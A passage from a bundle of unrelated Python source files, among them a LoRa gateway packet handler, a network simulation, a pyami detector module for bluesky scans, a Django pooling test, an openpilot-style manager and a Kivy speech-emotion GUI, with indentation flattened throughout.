pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
print '--> changed packet type to clear data'
else:
print "--> DATA encrypted: local aes not activated"
lorapktstr_b64=base64.b64encode(lorapktstr)
print "--> FYI base64 of LoRaWAN frame w/MIC: "+lorapktstr_b64
print "--> number of enabled clouds is %d" % len(_cloud_for_encrypted_data)
if len(_cloud_for_encrypted_data)==0:
print "--> discard encrypted data"
else:
#update pdata with new data length
pdata="%d,%d,%d,%d,%d,%d,%d" % (dst,ptype,src,seq,datalen,SNR,RSSI)
#loop over all enabled clouds to upload data
#once again, it is up to the corresponding cloud script to handle the data format
#
for cloud_index in range(0,len(_cloud_for_encrypted_data)):
try:
print "--> encrypted cloud[%d]" % cloud_index
cloud_script=_cloud_for_encrypted_data[cloud_index]
print "uploading with "+cloud_script
sys.stdout.flush()
cmd_arg=cloud_script+" \""+lorapktstr_b64.replace('\n','')+"\""+" \""+pdata.replace('\n','')+"\""+" \""+rdata.replace('\n','')+"\""+" \""+tdata.replace('\n','')+"\""+" \""+_gwid.replace('\n','')+"\""
except UnicodeDecodeError, ude:
print ude
else:
print cmd_arg
sys.stdout.flush()
try:
os.system(cmd_arg)
except:
print "Error when uploading data to encrypted cloud"
print "--> encrypted cloud end"
else:
_hasClearData=1
#with_appkey?
if ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1):
print "--> DATA with_appkey: read app key sequence"
the_app_key = getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
the_app_key = the_app_key + getSingleChar()
print "app key is ",
print " ".join("0x{:02x}".format(ord(c)) for c in the_app_key)
if _wappkey==1:
if the_app_key in key_AppKey.app_key_list:
print "in app key list"
_validappkey=1
else:
print "not in app key list"
_validappkey=0
else:
print "app key disabled"
_validappkey=1
continue
if (ch >= '\x50' and ch <= '\x54'):
print "--> got image packet"
cam_id=ord(ch)-0x50;
src_addr_msb = ord(getSingleChar())
src_addr_lsb = ord(getSingleChar())
src_addr = src_addr_msb*256+src_addr_lsb
seq_num = ord(getSingleChar())
Q = ord(getSingleChar())
data_len = ord(getSingleChar())
if (src_addr in nodeL):
#already in list
#get the file handler
theFile=fileH[src_addr]
#TODO
#start some timer to remove the node from nodeL
else:
#new image packet from this node
nodeL.append(src_addr)
filename =(_folder_path+"images/ucam_%d-node_%.4d-cam_%d-Q%d.dat" % (imgSN,src_addr,cam_id,Q))
print "first pkt from node %d" % src_addr
print "creating file %s" % filename
theFile=open(os.path.expanduser(filename),"w")
#associates the file handler to this node
fileH.update({src_addr:theFile})
#and associates imageFilename, imagSN,Q and cam_id
imageFilenameA.update({src_addr:filename})
imgsnA.update({src_addr:imgSN})
qualityA.update({src_addr:Q})
camidA.update({src_addr:cam_id})
imgSN=imgSN+1
t = Timer(90, image_timeout)
t.start()
#log only the first packet and the filename
f=open(os.path.expanduser(_imagelog_filename),"a")
f.write(info_str+' ')
now = datetime.datetime.now()
f.write(now.isoformat()+'> ')
f.write(filename+'\n')
f.close()
print "pkt %d from node %d data size is %d" % (seq_num,src_addr,data_len)
print "write to file"
theFile.write(format(data_len, '04X')+' ')
for i in range(1, data_len):
ch=getSingleChar()
#sys.stdout.write(hex(ord(ch)))
#sys.stdout.buffer.write(ch)
print (hex(ord(ch))),
theFile.write(format(ord(ch), '02X')+' ')
print "End"
sys.stdout.flush()
theFile.flush()
continue
if (ch == '?' and _ignoreComment==1):
sys.stdin.readline()
continue
sys.stdout.write(ch)
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.')
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
ami.py
|
import logging
import time
from importlib import import_module
from threading import Thread
import numpy as np
from ophyd.device import Device, Component as Cpt, Staged
from ophyd.signal import Signal
from ophyd.status import Status
from ophyd.utils.errors import ReadOnlyError
from toolz.itertoolz import partition
from .ext_scripts import get_hutch_name, get_ami_proxy
logger = logging.getLogger(__name__)
L3T_DEFAULT = '/reg/neh/operator/{}opr/l3t/amifil.l3t'
# Set uninitialized globals for style-checker
pyami = None
pyami_connected = None
ami_proxy = None
l3t_file = None
monitor_det = None
last_filter_string = None
hutch_name = None
# Define default starting values. Can also use to reset module.
def _reset_globals():
defaults = dict(pyami=None,
pyami_connected=False,
ami_proxy=None,
l3t_file=None,
monitor_det=None,
last_filter_string=None,
hutch_name=None)
globals().update(defaults)
_reset_globals()
def auto_setup_pyami():
"""
Does a best-guess at the ami configuration, if it has not yet been setup.
The steps are:
1. check hutch name
2. determine ami proxy and register it
3. setup detault l3t file
4. makes sure pyami is imported and connected to the ami proxy
This will be called the first time pyami is needed. We don't import at the
top of this file because we need to be able to import this file even if
pyami isn't in the environment, which is semi-frequent.
"""
global pyami
global pyami_connected
if None in (ami_proxy, l3t_file):
# get_hutch_name fails if not on nfs
# or on a bad nfs day, so only do if 100% needed
hutch = hutch_name or get_hutch_name()
if ami_proxy is None:
proxy = get_ami_proxy(hutch)
set_pyami_proxy(proxy)
if l3t_file is None:
set_l3t_file(L3T_DEFAULT.format(hutch))
if pyami is None:
logger.debug('importing pyami')
pyami = import_module('pyami')
if not pyami_connected:
logger.debug('initializing pyami')
try:
pyami.connect(ami_proxy)
pyami_connected = True
except Exception:
pyami_connected = False
raise
def set_ami_hutch(name):
"""
Pick the hutch name to skip a shell out to get_hutch_name.
Parameters
----------
name: ``str``
Name of the hutch
"""
global hutch_name
hutch_name = name.lower()
def set_pyami_proxy(proxy):
"""
Pick the hostname or group to use for the pyami connection.
Parameters
----------
proxy: ``str`` or ``int``
Either the server name or group number
"""
global ami_proxy
ami_proxy = proxy
def set_l3t_file(filename):
"""
Pick the file to write out for the l3t trigger
Parameters
----------
filename: ``str``
Full file path
"""
global l3t_file
l3t_file = filename
def set_monitor_det(det):
"""
Designate one `AmiDet` as the monitor.
The monitor det is the default normalization detector and the default
filtering detector when no detector is provided.
Parameters
----------
det: `AmiDet` or ``bool``
The detector to set as the monitor. Alternatively, pass in ``False`` to
disable the monitor det.
"""
global monitor_det
if det:
monitor_det = det
else:
monitor_det = None
def set_pyami_filter(*args, event_codes=None, operator='&', or_bykik=False):
"""
Set up the l3t filters.
These connect through pyami to call set_l3t or clear_l3t. The function
takes in arbitrary dets whose prefixes are the ami names, along with
low and highs.
Event codes are handled as a special case, since you always want high
vs low.
.. note::
If or_bykik is True, this will treat bykik at an l3t pass! This is
so you don't lose your off shots when the l3t trigger is in veto
mode.
Parameters
----------
*args: (`AmiDet`, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. You can omit the first
`AmiDet` as a shorthand for the current monitor, assuming a monitor
has been set with `Daq.set_monitor` or `set_monitor_det`.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when
the event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes.
This can either be ``|`` to ``or`` the conditions together, so
l3pass will happen if any filter passes, or it can be left at
the default ``&`` to ``and`` the conditions together, so l3pass
will only happen if all filters pass.
or_bykik: ``bool``, optional
False by default, appends an ``or`` condition that marks l3t pass
when we see the bykik event code. This makes sure the off shots
make it into the data if we're in l3t veto mode.
"""
global last_filter_string
auto_setup_pyami()
filter_string = dets_filter(*args, event_codes=event_codes,
operator=operator, or_bykik=or_bykik)
if filter_string is None:
pyami.clear_l3t()
else:
pyami.set_l3t(filter_string, l3t_file)
last_filter_string = filter_string
def dets_filter(*args, event_codes=None, operator='&', or_bykik=True):
"""
Return valid l3t/pyami filter strings in a useful format.
The function takes in arbitrary dets whose prefixes are the ami names,
along with low and highs. Event codes are handled as a special case, since
you always want high vs low.
.. note::
By default this will treat bykik at an l3t pass! This is so you don't
lose your off shots when the l3t trigger is in veto mode. You can
disable this with ``or_bykik=False``, but this will remain the default
behavior for backwards compatibility and to prevent someone from losing
shots that they wanted in the data.
Parameters
----------
*args: (`AmiDet`, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. You can omit the first
`AmiDet` as a shorthand for the current monitor, assuming a monitor has
been set with `Daq.set_monitor` or `set_monitor_det`.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when the
event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes. This
can either be ``|`` to ``or`` the conditions together, so l3pass will
happen if any filter passes, or it can be left at the default ``&`` to
``and`` the conditions together, so l3pass will only happen if all
filters pass.
or_bykik: ``bool``, optional
True by default, appends an ``or`` condition that marks l3t pass when
we see the bykik event code. This makes sure the off shots make it into
the data if we're in l3t veto mode.
Returns
-------
filter_string: ``str``
A valid filter string for `AmiDet` or for ``pyami.set_l3t``
"""
filter_strings = []
if len(args) % 3 == 2:
# One arg missing, add the monitor det as first arg
if monitor_det is None:
raise RuntimeError('Did not recieve args multiple of 3, but ',
'monitor_det is not set. Aborting.')
else:
args = [monitor_det] + list(args)
for det, lower, upper in partition(3, args):
if isinstance(det, str):
ami_name = det
elif isinstance(det, AmiDet):
ami_name = det.prefix
else:
raise TypeError('Must use AmiDet or string for filtering!')
filter_strings.append(basic_filter(ami_name, lower, upper))
if event_codes is not None:
for code in event_codes:
filter_strings.append(evr_filter(code))
if len(filter_strings) == 0:
return None
else:
base = concat_filter_strings(filter_strings, operator=operator)
if or_bykik:
bykik = evr_filter(162)
return concat_filter_strings([base, bykik], operator='|')
else:
return base
def basic_filter(ami_name, lower, upper):
"""
Helper function for creating an ami filter string.
Parameters
----------
ami_name: ``str``
The name of the value in ami
lower: ``float``
The lower bound for the value to pass
upper: ``float``
The upper bound for the value to pass
Returns
-------
filter_string: ``str``
"""
return '{}<{}<{}'.format(lower, ami_name, upper)
def evr_filter(event_code):
"""
Helper function that creates a filter for a certain event code.
Parameters
----------
event_code: ``int``
The event code to create a filter for
Returns
-------
filter_string: ``str``
"""
evr_base = 'DAQ:EVR:Evt{}'
return basic_filter(evr_base.format(event_code), 0.1, 2)
def concat_filter_strings(filter_strings, operator='&'):
"""
Helper function to combine ami filter strings
Parameters
----------
filter_strings: ``list``
The valid filter strings to combine
operator: ``str``
The operator to place between the filter strings. This can either be
``&`` or ``|``, for ``and`` or ``or`` respectively.
"""
if len(filter_strings) == 0:
raise ValueError('filter_strings must have at least one element')
elif len(filter_strings) == 1:
return filter_strings[0]
else:
sep = ')' + operator + '('
return '(' + sep.join(filter_strings) + ')'
class AmiDet(Device):
"""
Detector that gets data from pyami scalars.
The data will be in the form of an accumulated mean, rms, and number
of entries used in the calculations. The raw data is not avaiable via
pyami.
This only supports scalars. The array features are known to crash both the
python session and active ami clients, so don't use them.
Parameters
----------
prefix: ``str``
The ami name to use to retrieve the data.
name: ``str``, required keyword
The shorter name to use to label the data.
filter_str: ``str``, optional
If provided, we'll filter the incoming data using this filter string.
If omitted or None, we'll use the last set_l3t string.
If False, but not None, we'll do no filtering at all. This includes the
empty string.
min_duration: ``float``, optional
If provided, we'll wait this many seconds before declaring the
acquisition as complete. Otherwise, we'll stop acquring on read.
normalize: ``bool`` or ``AmiDet``, optional
Determines the normalization behavior of this detector. The default is
``True``, which means normalize to the current ``monitor_det``. See
`set_monitor_det`. ``False`` means do not normalize. You can also pass
in any other detector to normalize against something that is not the
``monitor_det``.
"""
mean = Cpt(Signal, value=0., kind='hinted')
err = Cpt(Signal, value=0., kind='hinted')
entries = Cpt(Signal, value=0, kind='normal')
mean_raw = Cpt(Signal, value=0., kind='normal')
err_raw = Cpt(Signal, value=0., kind='normal')
mean_mon = Cpt(Signal, value=0., kind='normal')
err_mon = Cpt(Signal, value=0., kind='normal')
entries_mon = Cpt(Signal, value=0., kind='normal')
mon_prefix = Cpt(Signal, value='', kind='normal')
rms = Cpt(Signal, value=0., kind='omitted')
def __init__(self, prefix, *, name, filter_string=None, min_duration=0,
normalize=True):
auto_setup_pyami()
self._entry = None
self._monitor = None
self.filter_string = filter_string
self.min_duration = min_duration
self.normalize = normalize
super().__init__(prefix, name=name)
def stage(self):
"""
Called early in a bluesky scan to initialize the pyami.Entry object.
Note that pyami.Entry objects begin accumulating data immediately.
This will be when the filter_string is used to determine how to filter
the pyami data. Setting the filter_string after stage is called will
have no effect.
Internally this creates a new pyami.Entry object. These objects start
accumulating data immediately.
"""
if self.filter_string is None and last_filter_string is not None:
self._entry = pyami.Entry(self.prefix, 'Scalar',
last_filter_string)
elif self.filter_string:
self._entry = pyami.Entry(self.prefix, 'Scalar',
self.filter_string)
else:
self._entry = pyami.Entry(self.prefix, 'Scalar')
if self.normalize:
if isinstance(self.normalize, AmiDet):
self._monitor = self.normalize
else:
self._monitor = monitor_det
if self._monitor is not None:
self.mon_prefix.put(self._monitor.prefix)
return super().stage()
def unstage(self):
"""
Called late in a bluesky scan to remove the pyami.Entry object and the
monitor.
"""
self._entry = None
if self._monitor is not None and self._monitor is not self:
self._monitor.unstage()
unstaged = super().unstage() + [self._monitor]
else:
unstaged = super().unstage()
self._monitor = None
self.mon_prefix.put('')
return unstaged
def trigger(self):
"""
Called during a bluesky scan to clear the accumulated pyami data.
This must be done because the pyami.Entry objects continually
accumulate data forever. You can stop it by deleting the objects
as in `unstage`, and you can clear it here to at least start from a
clean slate.
If min_duration is zero, this will return a status already marked done
and successful. Otherwise, this will return a status that will be
marked done after min_duration seconds.
If there is a normalization detector in use and it has not been staged,
it will be staged during the first trigger in a scan.
"""
if self._entry is None:
raise RuntimeError('AmiDet %s(%s) was never staged!', self.name,
self.prefix)
if self._monitor is not None and self._monitor is not self:
if self._monitor._staged != Staged.yes:
self._monitor.unstage()
self._monitor.stage()
monitor_status = self._monitor.trigger()
else:
monitor_status = None
self._entry.clear()
if self.min_duration:
def inner(duration, status):
time.sleep(duration)
status.set_finished()
status = Status(obj=self)
Thread(target=inner, args=(self.min_duration, status)).start()
else:
status = Status(obj=self)
status.set_finished()
if monitor_status is None:
return status
else:
return status & monitor_status
def get(self, *args, **kwargs):
self._get_data()
return super().get(*args, **kwargs)
def read(self, *args, **kwargs):
self._get_data()
return super().read(*args, **kwargs)
def _get_data(self):
"""
Helper function that stuffs ami data into this device's signals.
Parameters
----------
del_entry: ``bool``
If ``True``, we'll clear the accumulated data after getting it.
"""
if self._entry is None:
raise RuntimeError('Must stage AmiDet to begin accumulating data')
data = self._entry.get()
self.mean_raw.put(data['mean'])
self.rms.put(data['rms'])
self.entries.put(data['entries'])
# Calculate the standard error because old python did
if data['entries']:
data['err'] = data['rms']/np.sqrt(data['entries'])
else:
data['err'] = 0
self.err_raw.put(data['err'])
def adj_error(det_mean, det_err, mon_mean, mon_err):
return det_err/mon_mean + mon_err * (det_mean/mon_mean)**2
if self._monitor is None:
self.mean.put(data['mean'])
self.err.put(data['err'])
self.mean_mon.put(0)
self.err_mon.put(0)
self.entries_mon.put(0)
elif self._monitor is self:
self.mean.put(1)
if data['mean'] == 0:
self.err.put(np.nan)
else:
self.err.put(adj_error(data['mean'], data['err'],
data['mean'], data['err']))
self.mean_mon.put(data['mean'])
self.err_mon.put(data['err'])
self.entries_mon.put(data['entries'])
else:
mon_data = self._monitor.get()
if mon_data.mean_raw == 0:
self.mean.put(np.nan)
self.err.put(np.nan)
else:
self.mean.put(data['mean']/mon_data.mean_raw)
self.err.put(adj_error(data['mean'], data['err'],
mon_data.mean_raw,
mon_data.err_raw))
self.mean_mon.put(mon_data.mean_raw)
self.err_mon.put(mon_data.err_raw)
self.entries_mon.put(mon_data.entries)
def put(self, *args, **kwargs):
raise ReadOnlyError('AmiDet is read-only')
def set_det_filter(self, *args, event_codes=None, operator='&'):
"""
Set the filter on this detector only.
This lets you override the l3t filter for a single AmiDet. Call with
no arguments to revert to the last l3t filter. Call with a simple
``False`` to disable filtering on this detector. Call as you would to
set the l3t filter to setup a normal filtering override.
Parameters
----------
*args: (``AmiDet``, ``float``, ``float``) n times
A sequence of (detector, low, high), which create filters that make
sure the detector is between low and high. If instead, the first
argument is ``False``, we'll disable filtering on this detector.
event_codes: ``list``, optional
A list of event codes to include in the filter. l3pass will be when
the event code is present.
operator: ``str``, optional
The operator for combining the detector ranges and event codes.
This can either be ``|`` to ``or`` the conditions together, so
l3pass will happen if any filter passes, or it can be left at the
default ``&`` to ``and`` the conditions together, so l3pass will
only happen if all filters pass.
"""
if len(args) == 1 and not args[0]:
self.filter_string = False
else:
self.filter_string = dets_filter(*args, event_codes=event_codes,
operator=operator)
|
tests.py
|
'''
Simplistic test of pooling code
Created on Mar 28, 2013
@author: greg
'''
import random
import threading
n_threads = 6
n_fast_tests = 1000
n_slow_tests = 10
def test_slow_connection(execs_remaining):
print '%s: Test slow %s' % (threading.current_thread().name, n_slow_tests - execs_remaining)
signals.request_started.send(sender=base.BaseHandler)
cursor = connection.cursor()
cursor.execute("SELECT pg_sleep(1)")
signals.request_finished.send(sender=base.BaseHandler)
def test_fast_connection(execs_remaining):
print '%s: Test fast %s' % (threading.current_thread().name, n_fast_tests - execs_remaining)
signals.request_started.send(sender=base.BaseHandler)
cursor = connection.cursor()
cursor.execute("SELECT 1")
row = cursor.fetchone()
assert(row[0] == 1)
signals.request_finished.send(sender=base.BaseHandler)
def test_connection():
l_fast_tests = n_fast_tests
l_slow_tests = n_slow_tests
while l_fast_tests > 0 or l_slow_tests > 0:
if random.randint(0, n_fast_tests + n_slow_tests) < n_slow_tests and l_slow_tests > 0:
test_slow_connection(l_slow_tests)
l_slow_tests -= 1
elif l_fast_tests > 0:
test_fast_connection(l_fast_tests)
l_fast_tests -= 1
if __name__ == '__main__':
from django.core import signals
from django.core.handlers import base
from django.db import connection
print ('Running test_connection in %s threads with %s fast / %s slow loops each. '
'Should take about %s seconds.') % (n_threads, n_fast_tests, n_slow_tests, n_slow_tests)
# Warm up pool
cursor = connection.cursor()
cursor.execute("SELECT 1")
row = cursor.fetchone()
assert(row[0] == 1)
connection.close()
# Take requests in n_threads
for n in range(n_threads):
t = threading.Thread(target=test_connection)
t.start()
|
using_threading_module.py
|
import time
import threading
#create function for thread
def Tfunc(i):
print("Thread no.:%d" % (i+1))
time.sleep(5)
print("%d finished sleeping from thread\n" % i)
#start the thread for function
for i in range(3):
t1 = threading.Thread(target=Tfunc, args=(i,))
t1.start()
#check thread is alive or not
c=t1.isAlive()
#fetch the name of thread
c1=t1.getName()
print('\n',c1,"is Alive:",c)
#get toatal number of thread in execution
count=threading.active_count()
print("Total No of threads:",count)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \
terms_version, training_version, comma_remote, \
get_git_branch, get_git_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# add
("SshEnabled", "1"),
("LongControlSelect", "0"),
("AutoLaneChangeEnabled", "1"),
("PutPrebuilt", "0"),
("MfcSelect", "0"),
("LateralControlSelect", "0"),
("ShutdowndDisable", "1"),
("LoggerDisable", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("NewRadarInterface", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", version)
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_git_commit(default=""))
params.put("GitBranch", get_git_branch(default=""))
params.put("GitRemote", get_git_remote(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
for p in managed_processes.values():
p.stop()
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
if params.get_bool("ShutdowndDisable"):
not_run.append("shutdownd")
if params.get_bool("LoggerDisable"):
not_run.append("loggerd")
not_run.append("deleter")
not_run.append("logmessaged")
not_run.append("tombstoned")
not_run.append("uploader")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
#if started_prev and not started and 'updated' in managed_processes:
# os.sync()
# managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc]
cloudlog.debug(' '.join(running_list))
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# TODO: let UI handle this
# Exit main loop when uninstall is needed
if params.get_bool("DoUninstall"):
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
if Params().get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
CommandIssue.py
|
import Queue
import threading
class DummyBus:
def __init__(self):
self.CMDqueue = Queue.Queue(1) # arbitrary commnad queue
self.CMDdaemon = threading.Thread(target=self._issueRoutine, name='Command Issue Routine')
self.CMDdaemon.setDaemon(True)
self.CMDdaemon.start()
self.OUTqueue = Queue.Queue(1) # returned messages queue
return
def close(self):
self.CMDqueue.join()
return
def _issueRoutine(self):
" daemon for commiting commands in commnad queue:"
while True:
task = self.CMDqueue.get()
if not task == None:
command = task[0]
params = task[1]
if not command == None:
if params == None:
command()
else:
command(params)
pass
self.CMDqueue.task_done()
return
|
gui_start.py
|
import kivy
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.textinput import TextInput
from kivy.uix.button import Button
from kivy.uix.spinner import Spinner
from kivy.uix.slider import Slider
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.core.window import Window
from kivy.config import Config
import os
import glob
import time
import threading
import speech_recognition as sr
#program python files
import recordmic
import train
import predict
kivy.require('1.11.1') #require version
OPTIONS_FILE = "prevOptions.txt"
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
validFunctions = ['elu', 'softmax', 'selu', 'softplus', 'softsign', 'relu', 'tanh', 'tanh', 'hard_sigmoid', 'sigmoid', 'exponential', 'linear']
#do not forget to remove self.clipName upon exit program
Config.set('graphics', 'width', '1000')
Config.set('graphics', 'height', '1000')
Config.write()
def loadModels():
listOfModels = []
for folder in glob.glob(f"{CURRENT_DIR}\\models\\*"):
listOfModels.append(os.path.basename(folder))
return listOfModels
class StartPage(Widget):
def __init__(self, **kwargs):
self.buildLists()
super(StartPage, self).__init__(**kwargs)
#open prev options file
if os.path.isfile(OPTIONS_FILE):
with open(OPTIONS_FILE, "r") as fopt:
opt = fopt.read().split(',') #comma delimiter
def buildLists(self):
self.NN_MODELS = loadModels()
self.DATASETS = ['RAVDESS-TESS', 'RAVDESS', 'TESS', 'RAVDESS-User', 'User']
self.emotionsList = [s.capitalize() for s in train.trainingEmotions]
self.isRecording = False
self.clipName = "tempClip"
def updateModelList(self):
self.ids.modelDropList.values = self.NN_MODELS = loadModels()
def modelChanged(self, spinner, text):
self.modelName = self.ids.modelDropList.text
def recordBtnPress(self, instance):
if self.isRecording:
popupMsg = PopUp()
popupMsg.setText("Your voice is already being recorded.")
popupMsg.open()
return
#check if model is selected, show popup
if self.ids.modelDropList.text not in self.NN_MODELS:
popupMsg = PopUp()
popupMsg.setText("Please select a Neural Network Model to be used for emotion guessing.")
popupMsg.open()
return
#Change colour of Button to indicate recording
self.ids.recordBtn.background_normal = 'icn/mic_red.png'
self.isRecording = True
threading.Thread(target=self.recordMic).start()
def recordMic(self):
tempClipDirectory = f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav"
recordingTime = round(self.ids.recordLengthSlider.value, 1)
recordmic.recordAudio(tempClipDirectory, recordingTime)
self.ids.recordBtn.background_normal = 'icn/mic_blue.png'
#recording ended. Predict emotion using selected model
bestGuess, bestGuessConfidence, secondGuess, secondGuessConfidence = predict.predict(self.ids.modelDropList.text, tempClipDirectory)
if bestGuess == None:
self.ids.recordResultLabel.text = "Model loading failed."
self.isRecording = False
self.ids.recordBtn.background_normal = 'icn/mic_green.png'
return
self.ids.recordResultLabel.text = f"Predicted emotion: {bestGuess.capitalize()} with confidence of {bestGuessConfidence*100:5.2f}% \nNext guess is: {secondGuess.capitalize()} with confidence of {secondGuessConfidence*100:5.2f}%"
self.ids.emotionDropList.text = bestGuess.capitalize()
#speech to text
r = sr.Recognizer()
with sr.AudioFile(tempClipDirectory) as source:
audio = r.record(source)
try:
textTranscript = r.recognize_google(audio)
if len(textTranscript) > 1:
textTranscript = textTranscript.capitalize()
self.ids.recordTranscript.text = f"Transcript: {textTranscript}"
except sr.UnknownValueError:
self.ids.recordTranscript.text = f"Error: Unknown Value"
except sr.RequestError:
self.ids.recordTranscript.text = f"Error: Service is down"
#change back the color
self.ids.recordBtn.background_normal = 'icn/mic_green.png'
self.isRecording = False
def saveClipBtnPress(self, instance):
#retrieve predicted emotion from list
